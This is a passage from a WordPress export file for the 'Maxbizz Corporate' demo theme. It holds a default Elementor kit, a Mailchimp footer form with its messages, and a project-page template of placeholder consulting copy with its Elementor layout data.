		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/?elementor_library=default-kit</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:39:55]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:39:55]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[default-kit]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[kit]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_page_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:2:{s:9:"site_name";s:17:"Maxbizz Corporate";s:16:"site_description";s:47:"Financial &amp; Consulting Demo WordPress Theme";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:comment>
			<wp:comment_id>1</wp:comment_id>
			<wp:comment_author><![CDATA[A WordPress Commenter]]></wp:comment_author>
			<wp:comment_author_email><![CDATA[wapuu@wordpress.example]]></wp:comment_author_email>
			<wp:comment_author_url>https://wordpress.org/</wp:comment_author_url>
			<wp:comment_author_IP><![CDATA[]]></wp:comment_author_IP>
			<wp:comment_date><![CDATA[2020-11-09 04:39:56]]></wp:comment_date>
			<wp:comment_date_gmt><![CDATA[2020-11-09 04:39:56]]></wp:comment_date_gmt>
			<wp:comment_content><![CDATA[Hi, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from <a href="https://gravatar.com">Gravatar</a>.]]></wp:comment_content>
			<wp:comment_approved><![CDATA[1]]></wp:comment_approved>
			<wp:comment_type><![CDATA[comment]]></wp:comment_type>
			<wp:comment_parent>0</wp:comment_parent>
			<wp:comment_user_id>0</wp:comment_user_id>
							</wp:comment>
					</item>
					<item>
		<title>Footer Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/mc4wp-form/footer-form/</link>
		<pubDate>Mon, 02 Nov 2020 04:06:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/mc4wp-form/footer-form/</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="subscribe-inner-form">
    
	<button type="submit" class="subscribe-btn-icon"><i class="ot-flaticon-trajectory"></i></button>
</div>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>325</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:06:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:06:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[footer-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[mc4wp-form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_mc4wp_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:15:"required_fields";s:5:"EMAIL";s:12:"double_optin";s:1:"1";s:15:"update_existing";s:1:"0";s:17:"replace_interests";s:1:"1";s:15:"subscriber_tags";s:0:"";s:18:"hide_after_success";s:1:"0";s:8:"redirect";s:0:"";s:3:"css";s:1:"0";s:5:"lists";a:0:{}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_subscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[Thank you, your sign-up request was successful! Please check your email inbox to confirm.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_invalid_email]]></wp:meta_key>
		<wp:meta_value><![CDATA[Please provide a valid email address.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_required_field_missing]]></wp:meta_key>
		<wp:meta_value><![CDATA[Please fill in the required fields.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_already_subscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[Given email address is already subscribed, thank you!]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_error]]></wp:meta_key>
		<wp:meta_value><![CDATA[Oops. Something went wrong. Please try again later.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_unsubscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[You were successfully unsubscribed.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_not_subscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[Given email address is not subscribed.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_no_lists_selected]]></wp:meta_key>
		<wp:meta_value><![CDATA[Please select at least one list.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_updated]]></wp:meta_key>
		<wp:meta_value><![CDATA[Thank you, your records have been updated!]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-28]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-10-21]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>MB Project Single</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/?elementor_library=mb-project-single</link>
		<pubDate>Tue, 29 Sep 2020 08:52:15 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?elementor_library=mb-project-single</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>BusinessMax</p>		
			<h6>Website:</h6>		
		<p>businessmax.com</p>		
			<h6>Date:</h6>		
		<p>November 22, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							

	
		
			
		
	
	
	































						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							

	
		
			
		
	
	
	































						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-1-project.png" alt="" loading="lazy" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1050</wp:post_id>
		<wp:post_date><![CDATA[2020-09-29 08:52:15]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-29 08:52:15]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[mb-project-single]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="elementor_library_type" nicename="page"><![CDATA[page]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"4f485cbd","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"16cddd65","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"3a4e789","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1ec5aac2","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"2b13e690","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"339d13f0","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"5889fd7c","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"10dcad63","elType":"widget","settings":{"editor":"<p>BusinessMax<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"53d5271c","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5dcaf7e2","elType":"widget","settings":{"editor":"<p>businessmax.com<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"4b3ecf7a","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"12cac18e","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6e41b761","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"1ccebcb3","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5c6af9ae","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"2ea1549b","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"2bb4ff92","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"40167225","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"7125fb7b","elType":"section","settings":[],"elements":[{"id":"2292e976","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"74a4f2ef","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6b6408db","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7a6fb144","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"4359b052","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"5695beea","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"d323896","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"6c607602","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"524b70b7","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7a5ae6ff","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2bf4429e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"79862618","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"255cbb6f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"d7135a4","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"38949894","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7af2ac6e","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"22153473","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"2b9fdc68","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2a136c0a","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"199198b4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"66dcf71a","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #ff8523;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"18b9835e","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"5aa06968","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project.png","id":784},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"4283666a","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>maxbizz</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/maxbizz/</link>
		<pubDate>Fri, 02 Oct 2020 03:26:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/maxbizz/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1210</wp:post_id>
		<wp:post_date><![CDATA[2020-10-02 03:26:23]]></wp:post_date>
